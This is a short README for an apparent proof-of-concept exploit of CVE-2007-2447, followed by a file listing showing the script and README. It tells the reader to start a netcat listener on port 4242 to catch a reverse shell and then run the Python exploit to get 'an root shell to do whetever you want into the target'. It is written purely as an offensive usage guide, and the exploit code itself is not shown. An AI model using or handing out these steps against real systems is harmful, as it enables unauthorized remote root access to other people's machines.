### 1° Start listening netcat:
Choose whetever port you want, it will be important for the exploitation that you grant you an root shell, will use 4242 as example.
```
nc -lnpt 4242
```
### 2° Execute the exploit:
You just need to execute the exploit and provide the necessary informations requested by it.
```
python3 CVE-2007-2447.py
```
If everything is done correctly, you'll have an root shell to do whetever you want into the target :)
[4.0K] /data/pocs/0c9070ca071aea1471bb696db09c0aaeadb54fa2
├── [ 445] CVE-2007-2447.py
└── [ 447] README.md
0 directories, 2 files